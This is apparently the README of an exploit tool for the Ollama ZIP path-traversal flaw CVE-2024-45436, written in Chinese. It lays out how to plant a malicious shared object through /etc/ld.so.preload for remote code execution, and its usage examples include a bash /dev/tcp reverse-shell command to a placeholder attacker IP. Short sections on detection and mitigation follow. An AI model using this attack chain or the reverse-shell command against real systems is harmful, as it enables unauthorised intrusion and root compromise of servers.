# Ollama CVE-2024-45436 漏洞利用工具

这是一个简洁高效的 Ollama ZIP 遍历漏洞 (CVE-2024-45436) 利用工具。

## 漏洞描述

CVE-2024-45436 是 Ollama 0.1.47 版本之前存在的一个路径遍历漏洞（也称为 "Zip Slip"）。该漏洞允许攻击者通过在 ZIP 文件解压操作过程中利用路径验证不当，将文件写入文件系统上的任意位置。

漏洞存在于 Ollama 的 `model.go` 文件中的 `extractFromZipFile` 函数，该函数负责提取模型文件。当 ZIP 文件包含带有目录遍历序列（`../`）的条目时，Ollama 会将这些文件解压到预期目录之外，从而允许攻击者覆盖关键系统文件。

## 攻击原理

本工具通过以下方式利用漏洞：

1. 创建恶意共享对象文件（`hook.so`），其中包含可执行任意命令的代码
2. 将其打包到特制的 ZIP 文件中，包含路径遍历条目：
   - `../../../../../../../../../../etc/ld.so.preload` - 用于预加载自定义共享对象
   - `../../../../../../../../../../tmp/hook.so` - 恶意共享对象本身
3. 通过 Ollama 的 blob API 上传 ZIP 文件
4. 创建引用上传的 blob 的模型
5. 通过请求 embeddings 触发执行

成功执行后，有效载荷将以 Ollama 服务相同的权限运行，可能获得 root 权限的远程代码执行。

## 环境要求

- Python 3.6+
- 所需 Python 包：
  - requests
  - argparse
- GCC（编译共享对象）
- 运行 Linux 的易受攻击的 Ollama 实例（0.1.47 之前）

## 使用方法

```bash
python exp.py <目标URL> <命令>
```

### 参数说明

- `目标URL`：易受攻击的 Ollama 实例 URL（如 http://example.com:11434）
- `命令`：要在目标系统上执行的命令

### 选项

- `--no-cleanup`：利用后不删除临时文件（用于调试）

### 使用示例

基本用法：
```bash
python exp.py http://目标服务器:11434 "id > /tmp/pwned"
```

反向 shell：
```bash
python exp.py http://目标服务器:11434 "bash -c 'bash -i >& /dev/tcp/攻击者IP/4444 0>&1'"
```

## 免责声明

本工具仅供教育和授权安全测试目的使用。未经明确许可对系统进行未授权使用是非法和不道德的。作者对本软件的滥用不承担任何责任。

## 漏洞检测

组织可以通过以下方式检测是否易受攻击：

1. 通过 `/api/version` 检查 Ollama 版本
2. 查找 `/etc/ld.so.preload` 或 `/tmp/hook.so` 中的意外文件
3. 监控异常的模型创建活动

## 缓解措施

- 将 Ollama 更新到 0.1.47 或更高版本
- 如果无法立即更新，限制对 Ollama API 端点的网络访问
- 以最低权限运行 Ollama，不要使用 root 用户

## 技术细节

该漏洞利用了 Ollama 的 ZIP 文件解压过程中的路径验证不当。当通过 API 加载模型时，应用程序从 ZIP 归档中提取文件而不正确地验证文件路径，从而允许目录遍历攻击。

Linux 中的 `ld.so.preload` 文件用于指定应在所有其他库之前加载的共享库。通过写入此文件，攻击者可以确保其恶意库被任何新进程加载，从而有效地劫持程序执行。

## 许可证

本项目采用 MIT 许可证 - 详见 LICENSE 文件。
